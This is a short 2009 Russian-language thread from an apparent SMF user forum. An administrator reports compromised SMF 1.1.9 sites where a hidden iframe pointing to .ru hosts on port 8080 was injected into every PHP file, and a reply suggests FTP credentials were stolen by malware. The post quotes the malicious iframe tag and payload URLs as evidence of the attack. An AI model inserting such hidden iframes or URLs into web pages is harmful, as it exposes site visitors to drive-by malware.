Опять ломают...

Tonal · 14 июля 2009, 08:03:44

Второй день бьёмся.
Сломано как минимум 2 форума на поддерживаемых нами сайтах.

В *.php файлы во всех директориях вставляются iframe:


<iframe src="http://u1m.ru:8080/index.php" width=160 height=107 style="visibility: hidden"></iframe>

Адреса могут быть разными, например:

http://a3t.ru:8080/ts/in.cgi?pepsi91
http://u1m.ru:8080/index.php
http://u0s.ru:8080/index.php

Как эта зараза попадает не ясно.

Версия везде SMF 1.1.9.
Хостинги FreeBSD (Agawa)

digger® · 14 июля 2009, 08:07:52

Вирусок залетел к кому нибудь, у кого пароли в фтп-менеджере хранятся.

Cообщество пользователей SMF